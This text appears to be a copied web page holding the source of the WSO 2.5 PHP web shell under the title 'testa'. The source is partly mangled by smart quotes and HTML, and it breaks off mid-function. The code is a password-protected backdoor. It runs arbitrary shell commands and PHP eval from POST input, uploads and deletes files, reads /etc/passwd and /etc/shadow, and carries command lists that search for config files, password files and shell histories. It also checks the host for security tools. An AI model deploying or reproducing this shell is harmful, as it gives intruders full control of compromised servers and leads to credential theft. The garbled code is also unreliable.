testa

< ?php @session_start(); @set_time_limit(0); //PASSWORD CONFIGURATION @$pass = $_POST['pass']; $chk_login = true; $password = "ss"; //END CONFIGURATION if($pass == $password) { $_SESSION['nst'] = "$pass"; } if($chk_login == true) { if(!isset($_SESSION['nst']) or $_SESSION['nst'] != $password) { die(" W3Lcome<br /> <center></p> <table border=0 cellpadding=0 cellspacing=0 width=100% height=100%> <tr> <td valign=middle align=center> <table width=100 bgcolor=black border=6 bordercolor=green> <tr> <td> <font size=1 face=verdana><center><br /> <b></b></center></font> </td> </tr> </table> </td> </tr> </table> <p></center></p> <form method=post> <font size=1 face=verdana color=blue><strong><center>-W3lcOme </p> <p>–</center></strong><br /> <input type=password name=pass size=30/><br /> </font></form> <p> <b>Your ip :D:</b> “.$_SERVER[“REMOTE_ADDR”].”</p> <p> “);<br /> }<br /> }<br /> $default_action=’FilesMan';$default_use_ajax=false;$default_charset=’Windows-1251′;@ini_set(‘error_log’,NULL);@ini_set(‘log_errors’,0);@ini_set(‘max_execution_time’,0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define(‘WSO_VERSION’,’2.5 lt’);if(get_magic_quotes_gpc()){function WSOstripslashes($array){return is_array($array)?array_map(‘WSOstripslashes’,$array):stripslashes($array);}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function WSOsetcookie($k,$v){$_COOKIE[$k]=$v;setcookie($k,$v);}$safe_mode=@ini_get(‘safe_mode’);if(!$safe_mode){error_reporting(0);}$home_cwd=@getcwd();if(isset($_POST[‘c’])){@chdir($_POST[‘c’]);}$cwd=@getcwd();$aliases=array(“List dir”=>”ls -lha”,”list file attributes on a Linux second extended file system”=>”lsattr -va”,”show opened ports”=>”netstat -an | grep -i listen”,”process status”=>”ps aux”,”Find”=>””,”find all suid files”=>”find / -type f -perm -04000 -ls”,”find suid files in current dir”=>”find . -type f -perm -04000 -ls”,”find all sgid files”=>”find / -type f -perm -02000 -ls”,”find sgid files in current dir”=>”find . -type f -perm -02000 -ls”,”find config.inc.php files”=>”find / -type f -name config.inc.php”,”find config* files”=>”find / -type f -name \”config*\””,”find config* files in current dir”=>”find . -type f -name \”config*\””,”find all writable folders and files”=>”find / -perm -2 -ls”,”find all writable folders and files in current dir”=>”find . -perm -2 -ls”,”find all service.pwd files”=>”find / -type f -name service.pwd”,”find service.pwd files in current dir”=>”find . -type f -name service.pwd”,”find all .htpasswd files”=>”find / -type f -name .htpasswd”,”find .htpasswd files in current dir”=>”find . -type f -name .htpasswd”,”find all .bash_history files”=>”find / -type f -name .bash_history”,”find .bash_history files in current dir”=>”find . -type f -name .bash_history”,”find all .fetchmailrc files”=>”find / -type f -name .fetchmailrc”,”find .fetchmailrc files in current dir”=>”find . -type f -name .fetchmailrc”,”Locate”=>””,”locate httpd.conf files”=>”locate httpd.conf”,”locate vhosts.conf files”=>”locate vhosts.conf”,”locate proftpd.conf files”=>”locate proftpd.conf”,”locate psybnc.conf files”=>”locate psybnc.conf”,”locate my.conf files”=>”locate my.conf”,”locate admin.php files”=>”locate admin.php”,”locate cfg.php files”=>”locate cfg.php”,”locate conf.php files”=>”locate conf.php”,”locate config.dat files”=>”locate config.dat”,”locate config.php files”=>”locate config.php”,”locate config.inc files”=>”locate config.inc”,”locate config.inc.php”=>”locate config.inc.php”,”locate config.default.php files”=>”locate config.default.php”,”locate config* files”=>”locate config”,”locate .conf files”=>”locate ‘.conf'”,”locate .pwd files”=>”locate ‘.pwd'”,”locate .sql files”=>”locate ‘.sql'”,”locate .htpasswd files”=>”locate ‘.htpasswd'”,”locate .bash_history files”=>”locate ‘.bash_history'”,”locate .mysql_history files”=>”locate ‘.mysql_history'”,”locate .fetchmailrc files”=>”locate ‘.fetchmailrc'”,”locate backup files”=>”locate backup”,”locate dump files”=>”locate dump”,”locate priv files”=>”locate priv”);$os=’nix';if(strtolower(substr(PHP_OS,0,3))==”win”){$os=’win';$home_cwd=str_replace(“\\”,”/”,$home_cwd);$cwd=str_replace(“\\”,”/”,$cwd);$aliases=array(“List Directory”=>”dir”,”Find index.php in current dir”=>”dir /s /w /b index.php”,”Find *config*.php in current dir”=>”dir /s /w /b *config*.php”,”Show active connections”=>”netstat -an”,”Show running services”=>”net start”,”User accounts”=>”net user”,”Show computers”=>”net view”,”ARP Table”=>”arp -a”,”IP Configuration”=>”ipconfig /all”);}$disable_functions=@ini_get(‘disable_functions’);if($cwd[strlen($cwd)-1]!=’/’){$cwd.=’/';}if(!isset($_COOKIE[md5($_SERVER[‘HTTP_HOST’]).’ajax’])){$_COOKIE[md5($_SERVER[‘HTTP_HOST’]).’ajax’]=(bool)$default_use_ajax;}function wsoHeader(){if(empty($_POST[‘charset’])){$_POST[‘charset’]=$GLOBALS[‘default_charset’];}echo “<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'/><br /> <style>body{background-color:#444;color:#e1e1e1;}body,td,th{font:9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1;}table.info{color:#fff;background-color:#222;}span,h1,a{color:#df5 !important;}span{font-weight:bolder;}h1{border-left:5px solid #df5;padding:2px 5px;font:14pt Verdana;background-color:#222;margin:0px;}div.content{padding:5px;margin-left:5px;background-color:#333;}a{text-decoration:none;}a:hover{text-decoration:underline;}.ml1{border:1px solid #444;padding:5px;margin:0;overflow:auto;}.bigarea{width:100%;height:300px;}input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid #df5;font:9pt Monospace,'Courier New';}form{margin:0px;}#toolsTbl{text-align:center;}.toolsInp{width:300px}.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style> <p><script>var c_='".htmlspecialchars($GLOBALS['cwd'])."';var a_='".htmlspecialchars(@$_POST['a'])."';var charset_='".htmlspecialchars(@$_POST['charset'])."';var p1_='".((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES))."';var p2_='".((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES))."';var p3_='".((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES))."';var d=document;function set(a,c,p1,p2,p3,charset) {if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;}function g(a,c,p1,p2,p3,charset){set(a,c,p1,p2,p3,charset);d.mf.submit();}function a(a,c,p1,p2,p3,charset){set(a,c,p1,p2,p3,charset);var params='ajax=true';for(i=0;i<d .mf.elements.length;i++){params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);}sr('".addslashes($_SERVER['REQUEST_URI'])."',params);}function sr(url, params) {if(window.XMLHttpRequest){req = new XMLHttpRequest();}else if (window.ActiveXObject){req=new ActiveXObject('Microsoft.XMLHTTP');}if(req){req.onreadystatechange=processReqChange;req.open('POST',url,true);req.setRequestHeader('Content-Type','application/x-www-form-urlencoded');req.send(params);}}function processReqChange(){if((req.readyState==4))if(req.status==200){var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');var arr=reg.exec(req.responseText);eval(arr[2].substr(0, arr[1]));}else{alert('Request error!');}}</script><head><body> <div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'><input type=hidden name=a/><input type=hidden name=c/><input type=hidden name=p1/><input type=hidden name=p2/><input type=hidden name=p3/><input type=hidden name=charset/></form> <p>";$freeSpace=@diskfreespace($GLOBALS['cwd']);$totalSpace=@disk_total_space($GLOBALS['cwd']);$totalSpace=$totalSpace?$totalSpace:1;$release=@php_uname('r');$kernel=@php_uname('s');$explink='http://exploit-db.com/search/?action=search&filter_description=';if(strpos('Linux',$kernel)!==false){$explink.=urlencode('Linux Kernel '.substr($release,0,6));}else{$explink.=urlencode($kernel.' '.substr($release,0,3));}if(!function_exists('posix_getegid')){$user=@get_current_user();$uid=@getmyuid();$gid=@getmygid();$group="?";}else{$uid=@posix_getpwuid(posix_geteuid());$gid=@posix_getgrgid(posix_getegid());$user=$uid['name'];$uid=$uid['uid'];$group=$gid['name'];$gid=$gid['gid'];}$cwd_links='';$path=explode("/",$GLOBALS['cwd']);$n=count($path);for($i=0;$i< $n-1;$i++){$cwd_links.="<a href='#' onclick='g(\"FilesMan\",\"";for($j=0;$j<=$i;$j++){$cwd_links.=$path[$j].'/';}$cwd_links.="\")'>".$path[$i]."/";}$charsets=array('UTF-8','Windows-1251','KOI8-R','KOI8-U','cp866');$opt_charsets='';foreach($charsets as $item){$opt_charsets.='<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';}$m=array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Php'=>'Php');$menu='';foreach($m as $k=>$v){$menu.=' <th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th> <p>';}$drives="";if($GLOBALS['os']=='win'){foreach(range('c','z') as $drive){if(is_dir($drive.':\\')){$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';}}}echo '<br /> <table class=info cellpadding=3 cellspacing=0 width=100%> <tr> <td width=1><span>Uname:<br />User:<br />Php:<br />Hdd:<br />Cwd:'.($GLOBALS['os']=='win'?'<br />Drives:':'').'</span></td> <td><nobr>'.substr(@php_uname(),0,120).' <a href="'.$explink.'" target=_blank>[exploit-db.com]</a></nobr><br />'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br />'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>').'<a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br />'.wsoViewSize($totalSpace).' <span>Free:</span> '.wsoViewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br />'.$cwd_links.' '.wsoPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br />'.$drives.'</td> <td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br /><span>Server IP:</span><br />'.@$_SERVER["SERVER_ADDR"] . '<br /><span>Client IP:</span><br />'.$_SERVER['REMOTE_ADDR'] . '</nobr></td> </tr> </table> <table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%> <tr>'.$menu.'</tr> </table> <div style="margin:5">';}function wsoFooter(){$is_writable=is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>";echo "</div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td> <form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br /><input class='toolsInp' type=text name=c value='".htmlspecialchars($GLOBALS['cwd'])."'/><input type=submit value='/>>'></form> </td> <td> <form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br /><input class='toolsInp' type=text name=f/><input type=submit value='/>>'></form> </td> </tr> <tr> <td> <form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br /><input class='toolsInp' type=text name=d/><input type=submit value='/>>'></form> </td> <td> <form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br /><input class='toolsInp' type=text name=f/><input type=submit value='/>>'></form> </td> </tr> <tr> <td> <form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br /><input class='toolsInp' type=text name=c value=''/><input type=submit value='/>>'></form> </td> <td> <form method='post' ENCTYPE='multipart/form-data'><input type=hidden name=a value='FilesMAn'/><input type=hidden name=c value='".$GLOBALS['cwd']."'/><input type=hidden name=p1 value='uploadFile'/><input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'/><span>Upload file:</span>$is_writable<br /><input class='toolsInp' type=file name=f/><input type=submit value='/>>'></form> <p></td> </tr> </table> </div> <p></body></head></d></script></head></html>“;}if(!function_exists(“posix_getpwuid”)&&(strpos($GLOBALS[‘disable_functions’],’posix_getpwuid’)===false)){function posix_getpwuid($p){return false;}}if(!function_exists(“posix_getgrgid”)&&(strpos($GLOBALS[‘disable_functions’],’posix_getgrgid’)===false)){function posix_getgrgid($p){return false;}}function wsoEx($in){$out=”;if(function_exists(‘exec’)){@exec($in,$out);$out=@join(“\n”,$out);}elseif(function_exists(‘passthru’)){ob_start();@passthru($in);$out=ob_get_clean();}elseif(function_exists(‘system’)){ob_start();@system($in);$out=ob_get_clean();}elseif(function_exists(‘shell_exec’)){$out=shell_exec($in);}elseif(is_resource($f=@popen($in,”r”))){$out=””;while(!@feof($f)){$out.= fread($f,1024);}pclose($f);}return $out;}function wsoViewSize($s){if(is_int($s))$s=sprintf(“%u”,$s);if($s>=1073741824){return sprintf(‘%1.2f’,$s/1073741824).’ GB';}elseif($s>=1048576){return sprintf(‘%1.2f’,$s/1048576).’ MB';}elseif($s>=1024){return sprintf(‘%1.2f’,$s/1024).’ KB';}else{return $s.’ B';}}function wsoPerms($p){if(($p&0xC000)==0xC000){$i=’s';}elseif(($p&0xA000)==0xA000){$i=’l';}elseif(($p&0x8000)==0x8000){$i=’-‘;}elseif(($p&0x6000)==0x6000){$i=’b';}elseif(($p&0x4000)==0x4000){$i=’d';}elseif(($p&0x2000)==0x2000){$i=’c';}elseif(($p&0x1000)==0x1000){$i=’p';}else{$i=’u';}$i.=(($p&0x0100)?’r':’-‘);$i.=(($p&0x0080)?’w':’-‘);$i.=(($p&0x0040)?(($p&0x0800)?’s':’x’):(($p&0x0800)?’S':’-‘));$i.=(($p&0x0020)?’r':’-‘);$i.=(($p&0x0010)?’w':’-‘);$i.=(($p&0x0008)?(($p&0x0400)?’s':’x’):(($p&0x0400)?’S':’-‘));$i.=(($p&0x0004)?’r':’-‘);$i.=(($p&0x0002)?’w':’-‘);$i.=(($p&0x0001)?(($p&0x0200)?’t':’x’):(($p&0x0200)?’T':’-‘));return $i;}function wsoPermsColor($f){if(!@is_readable($f)){return ‘<font color=#FF0000>‘.wsoPerms(@fileperms($f)).’</font>‘;}elseif(!@is_writable($f)){return ‘<font color=white>‘.wsoPerms(@fileperms($f)).’</font>‘;}else{return ‘<font color=#25ff00>‘.wsoPerms(@fileperms($f)).’</font>‘;}}function wsoScandir($dir){if(function_exists(“scandir”)){return scandir($dir);}else{$dh=opendir($dir);while(false!==($filename=readdir($dh))){$files[]=$filename;}}return $files;}function wsoWhich($p){$path=wsoEx(‘which ‘.$p);if(!empty($path)){return $path;}return false;}function actionSecInfo(){wsoHeader();echo ‘<br /> <h1>Server security information</h1> <div class=content>‘;function wsoSecParam($n,$v){$v=trim($v);if($v){echo ‘<span>‘.$n.': </span>‘;if(strpos($v,”\n”)===false){echo $v.’<br />‘;}else{echo ‘ <pre class=ml1>'.$v.'</pre> <p>‘;}}}wsoSecParam(‘Server software’,@getenv(‘SERVER_SOFTWARE’));if(function_exists(‘apache_get_modules’)){wsoSecParam(‘Loaded Apache modules’,implode(‘, ‘,apache_get_modules()));}wsoSecParam(‘Disabled PHP Functions’,$GLOBALS[‘disable_functions’]?$GLOBALS[‘disable_functions’]:’none’);wsoSecParam(‘Open base dir’,@ini_get(‘open_basedir’));wsoSecParam(‘Safe mode exec dir’,@ini_get(‘safe_mode_exec_dir’));wsoSecParam(‘Safe mode include dir’,@ini_get(‘safe_mode_include_dir’));wsoSecParam(‘cURL support’,function_exists(‘curl_version’)?’enabled':’no’);$temp=array();if(function_exists(‘mysql_get_client_info’)){$temp[]=”MySql (“.mysql_get_client_info().”)”;}if(function_exists(‘mssql_connect’)){$temp[]=”MSSQL”;}if(function_exists(‘pg_connect’)){$temp[]=”PostgreSQL”;}if(function_exists(‘oci_connect’)){$temp[]=”Oracle”;}wsoSecParam(‘Supported databases’,implode(‘, ‘,$temp));echo ‘<br />‘;if($GLOBALS[‘os’]==’nix’){wsoSecParam(‘Readable /etc/passwd’,@is_readable(‘/etc/passwd’)?”yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>“:’no’);wsoSecParam(‘Readable /etc/shadow’,@is_readable(‘/etc/shadow’)?”yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>“:’no’);wsoSecParam(‘OS version’,@file_get_contents(‘/proc/version’));wsoSecParam(‘Distr name’,@file_get_contents(‘/etc/issue.net’));if(!$GLOBALS[‘safe_mode’]){$userful=array(‘gcc’,’lcc’,’cc’,’ld’,’make’,’php’,’perl’,’python’,’ruby’,’tar’,’gzip’,’bzip’,’bzip2′,’nc’,’locate’,’suidperl’);$danger=array(‘kav’,’nod32′,’bdcored’,’uvscan’,’sav’,’drwebd’,’clamd’,’rkhunter’,’chkrootkit’,’iptables’,’ipfw’,’tripwire’,’shieldcc’,’portsentry’,’snort’,’ossec’,’lidsadm’,’tcplodg’,’sxid’,’logcheck’,’logwatch’,’sysmask’,’zmbscap’,’sawmill’,’wormscan’,’ninja’);$downloaders=array(‘wget’,’fetch’,’lynx’,’links’,’curl’,’get’,’lwp-mirror’);echo ‘<br />‘;$temp=array();foreach($userful as $item){if(wsoWhich($item)){$temp[]=$item;}}wsoSecParam(‘Userful’,implode(‘, ‘,$temp));$temp=array();foreach($danger as $item){if(wsoWhich($item)){$temp[]=$item;}}wsoSecParam(‘Danger’,implode(‘, ‘,$temp));$temp=array();foreach($downloaders as $item){if(wsoWhich($item)){$temp[]=$item;}}wsoSecParam(‘Downloaders’,implode(‘, ‘,$temp));echo ‘<br />‘;wsoSecParam(‘HDD space’,wsoEx(‘df -h’));wsoSecParam(‘Hosts’,@file_get_contents(‘/etc/hosts’));echo ‘<br /><span>posix_getpwuid (“Read” /etc/passwd)</span><br /> <table> <form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'> <tr> <td>From</td> <td><input type=text name=param1 value=0/></td> </tr> <tr> <td>To</td> <td><input type=text name=param2 value=1000/></td> </tr> </form> </table> <p><input type=submit value="/>>”>';if(isset($_POST[‘p2′],$_POST[‘p3′])&&is_numeric($_POST[‘p2′])&&is_numeric($_POST[‘p3′])){$temp=””;for(;$_POST[‘p2′]< =$_POST['p3'];$_POST['p2']++){$uid=@posix_getpwuid($_POST['p2']);if($uid){$temp.=join(':',$uid)."\n";}}echo '<br/>‘;wsoSecParam(‘Users’,$temp);}}}else{wsoSecParam(‘OS Version’,wsoEx(‘ver’));wsoSecParam(‘Account Settings’,wsoEx(‘net accounts’));wsoSecParam(‘User Accounts’,wsoEx(‘net user’));}echo ‘</div> <p>‘;wsoFooter();}function actionPhp(){if(isset($_POST[‘ajax’])){WSOsetcookie(md5($_SERVER[‘HTTP_HOST’]).’ajax’,true);ob_start();eval($_POST[‘p1′]);$temp=”document.getElementById(‘PhpOutput’).style.display=”;document.getElementById(‘PhpOutput’).innerHTML='”.addcslashes(htmlspecialchars(ob_get_clean()),”\n\r\t\\’\0″).”‘;\n”;echo strlen($temp),”\n”,$temp;exit;}if(empty($_POST[‘ajax’]) && !empty($_POST[‘p1′])){WSOsetcookie(md5($_SERVER[‘HTTP_HOST’]).’ajax’,0);}wsoHeader();if(isset($_POST[‘p2′])&&($_POST[‘p2′]==’info’)){echo ‘<br /> <h1>PHP info</h1> <div class=content> <style>.p {color:#000;}</style> <p>‘;ob_start();phpinfo();$tmp=ob_get_clean();$tmp=preg_replace(array(‘!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU’,’!td, th {(.*)}!msiU’,’!<img [^/>]+>!msiU’,),array(”,’.e, .v, .h, .h th {$1}’,”),$tmp);echo str_replace(‘<br /> <h1 ','<h2',$tmp).'</div> <p>‘;}echo ‘</h1> <h1>Execution PHP-code</h1> <div class=content> <form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>‘.(!empty($_POST[‘p1′])?htmlspecialchars($_POST[‘p1′]):”).’</textarea><input type=submit value=Eval style="margin-top:5px"/>‘;echo ‘ <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'/> send using AJAX</form> <pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';if(!empty($_POST['p1'])){ob_start();eval($_POST['p1']);echo htmlspecialchars(ob_get_clean());}echo '</pre> </div> <p>‘;wsoFooter();}function actionFilesMan(){if(!empty($_COOKIE[‘f’])){$_COOKIE[‘f’]=@unserialize($_COOKIE[‘f’]);}if(!empty($_POST[‘p1′])){switch($_POST[‘p1′]){case ‘uploadFile':if(!@move_uploaded_file($_FILES[‘f’][‘tmp_name’], $_FILES[‘f’][‘name’])){echo “Can’t upload file!”;}break;case ‘mkdir':if(!@mkdir($_POST[‘p2′])){echo “Can’t create new dir”;}break;case ‘delete':function deleteDir($path){$path=(substr($path,-1)==’/’)?$path:$path.’/';$dh=opendir($path);while(($item=readdir($dh))!==false){$item=$path.$item;if((basename($item)==”..”)||(basename($item)==”.”)){continue;}$type=filetype($item);if($type==”dir”){deleteDir($item);}else{@unlink($item);}}closedir($dh);@rmdir($path);}if(is_array(@$_POST[‘f’])){foreach($_POST[‘f’] as $f){if($f==’..’){continue;}$f=urldecode($f);if(is_dir($f)){deleteDir($f);}else{@unlink($f);}}}break;case ‘paste':if($_COOKIE[‘act’] == ‘copy’) {function copy_paste($c,$s,$d){if(is_dir($c.$s)){mkdir($d.$s);$h=@opendir($c.$s);while(($f=@readdir($h))!==false){if(($f!=”.”)and($f!=”..”)){copy_paste($c.$s.’/’,$f, $d.$s.’/’);}}} elseif(is_file($c.$s)){@copy($c.$s, $d.$s);}}foreach($_COOKIE[‘f’] as $f){copy_paste($_COOKIE[‘c’],$f,$GLOBALS[‘cwd’]);}}elseif($_COOKIE[‘act’]==’move’){function move_paste($c,$s,$d){if(is_dir($c.$s)){mkdir($d.$s);$h=@opendir($c.$s);while(($f=@readdir($h))!==false){if(($f!=”.”)and($f!=”..”)){copy_paste($c.$s.’/’,$f, $d.$s.’/’);}}}elseif(@is_file($c.$s)){@copy($c.$s,$d.$s);}}foreach($_COOKIE[‘f’] as $f){@rename($_COOKIE[‘c’].$f, $GLOBALS[‘cwd’].$f);}} elseif($_COOKIE[‘act’] == ‘zip’) {if(class_exists(‘ZipArchive’)){$zip=new ZipArchive();if($zip->open($_POST[‘p2′],1)){chdir($_COOKIE[‘c’]);foreach($_COOKIE[‘f’] as $f){if($f==’..’){continue;}if(@is_file($_COOKIE[‘c’].$f)){$zip->addFile($_COOKIE[‘c’].$f,$f);}elseif(@is_dir($_COOKIE[‘c’].$f)){$iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.’/’,FilesystemIterator::SKIP_DOTS));foreach ($iterator as $key=>$value) {$zip->addFile(realpath($key), $key);}}}chdir($GLOBALS[‘cwd’]);$zip->close();}}}elseif($_COOKIE[‘act’]==’unzip’){if(class_exists(‘ZipArchive’)){$zip=new ZipArchive();foreach($_COOKIE[‘f’] as $f){if($zip->open($_COOKIE[‘c’].$f)){$zip->extractTo($GLOBALS[‘cwd’]);$zip->close();}}}}elseif($_COOKIE[‘act’]==’tar’){chdir($_COOKIE[‘c’]);$_COOKIE[‘f’]=array_map(‘escapeshellarg’,$_COOKIE[‘f’]);wsoEx(‘tar cfzv ‘.escapeshellarg($_POST[‘p2′]).’ ‘.implode(‘ ‘, $_COOKIE[‘f’]));chdir($GLOBALS[‘cwd’]);}unset($_COOKIE[‘f’]);setcookie(‘f’,”,time()-3600);break;default:if(!empty($_POST[‘p1′])) {WSOsetcookie(‘act’,$_POST[‘p1′]);WSOsetcookie(‘f’,serialize(@$_POST[‘f’]));WSOsetcookie(‘c’,@$_POST[‘c’]);}break;}}wsoHeader();echo ‘<br /> <h1>File manager</h1> <div class=content><script>p1_=p2_=p3_="";</script>‘;$dirContent=wsoScandir(isset($_POST[‘c’])?$_POST[‘c’]:$GLOBALS[‘cwd’]);if($dirContent===false){echo ‘Can\’t open this folder!';wsoFooter();return;}global $sort;$sort=array(‘name’,1);if(!empty($_POST[‘p1′])){if(preg_match(‘!s_([A-z]+)_(\d{1})!’,$_POST[‘p1′],$match)){$sort=array($match[1],(int)$match[2]);}}echo “<script>function sa(){for(i=0;i<d .files.elements.length;i++){if(d.files.elements[i].type=='checkbox'){d.files.elements[i].checked = d.files.elements[0].checked;}}}</script><br /> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post> <tr> <th width='13px'><input type=checkbox onclick='sa()' class=chkbx/></th> <th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th> <th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th> <th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th> <th>Owner/Group</th> <th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th> <th>Actions</th> </tr> <p>";$dirs=$files=array();$n=count($dirContent);for($i=0;$i< $n;$i++){$ow=@posix_getpwuid(@fileowner($dirContent[$i]));$gr=@posix_getgrgid(@filegroup($dirContent[$i]));$tmp=array('name'=>$dirContent[$i],'path'=>$GLOBALS['cwd'].$dirContent[$i],'modify'=>date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),'perms'=>wsoPermsColor($GLOBALS['cwd'].$dirContent[$i]),'size'=>@filesize($GLOBALS['cwd'].$dirContent[$i]),'owner'=>$ow['name']?$ow['name']:@fileowner($dirContent[$i]),'group'=>$gr['name']?$gr['name']:@filegroup($dirContent[$i]));if(@is_file($GLOBALS['cwd'].$dirContent[$i])){$files[]=array_merge($tmp,array('type'=>'file'));}elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])){$dirs[]=array_merge($tmp, array('type'=>'link','link'=>readlink($tmp['path'])));}elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])){$dirs[]=array_merge($tmp,array('type'=>'dir'));}}$GLOBALS['sort']=$sort;function wsoCmp($a, $b){if($GLOBALS['sort'][0]!='size'){return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);}else{return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);}}usort($files,"wsoCmp");usort($dirs,"wsoCmp");$files=array_merge($dirs,$files);$l=0;foreach($files as $f) {echo ' <tr'.($l?' class=l1':'').'> <td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx/></td> <td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td> <td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td> <td>'.$f['modify'].'</td> <td>'.$f['owner'].'/'.$f['group'].'</td> <td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'].'</a></td> <td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td> <p>';$l=$l?0:1;}echo "<br /> <tr> <td colspan=7><input type=hidden name=a value='FilesMan'/><input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd'])."'/><input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'/><select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";if(class_exists('ZipArchive')){echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";}echo "<option value='tar'>Compress (tar.gz)</option>";if(!empty($_COOKIE['act'])&&@count($_COOKIE['f'])){echo "<option value='paste'>Paste / Compress</option>";}echo "</select> ";if(!empty($_COOKIE['act'])&&@count($_COOKIE['f'])&&(($_COOKIE['act']=='zip')||($_COOKIE['act']=='tar'))){echo "file name: <input type=text name=p2 value='wso_".date("Ymd_His").".".($_COOKIE['act']=='zip'?'zip':'tar.gz')."'/> ";}echo "<input type='submit' value='/>>'></td> </tr> </form> </table> <p></d></script></div> <p>“;wsoFooter();}function 